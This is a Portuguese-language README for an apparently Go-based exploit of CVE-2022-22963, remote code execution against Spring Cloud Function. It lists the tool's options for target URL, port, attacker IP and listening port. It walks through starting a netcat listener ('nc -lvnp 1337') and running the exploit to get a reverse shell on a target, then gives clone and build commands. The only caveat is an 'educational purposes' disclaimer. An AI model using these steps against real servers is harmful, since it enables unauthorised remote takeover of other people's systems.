
Binários para CVE-2022-22963
Execução Remota de Código explorando CVE-2022-22963 atacando serviço Spring Cloud.
Aviso: Isto é apenas para fins educacionais. O autor não se responsabiliza pelo uso deste programa. Use por sua própria conta e risco
./CVE-2022-22963 -h
Uso:
CVE-2022-22963 [OPÇÕES]
Opções da Aplicação:
-u, --target-url= URL do alvo/host onde o 'Spring Cloud' está em execução. Exemplo: -t http://somesite.htb
-p, --target-port= Porta onde o serviço está em execução. Exemplo: -p 8080
-i, --attacker-ip= Endereço IPv4 do atacante. Exemplo: -i 10.10.10.10
-l, --listening-port= Porta de escuta para conectar. Exemplo: -l 1337
Opções de Ajuda:
-h, --help Mostra esta mensagem de ajuda
Suponha que um possível alvo vulnerável esteja em execução em http://somerandomserver.com:8080. Inicie o nc escutando na porta 1337, então executamos nc -lvnp 1337. Em seguida, execute o script/exploit:
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337
Se você tiver go instalado na sua máquina, basta fazer:
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file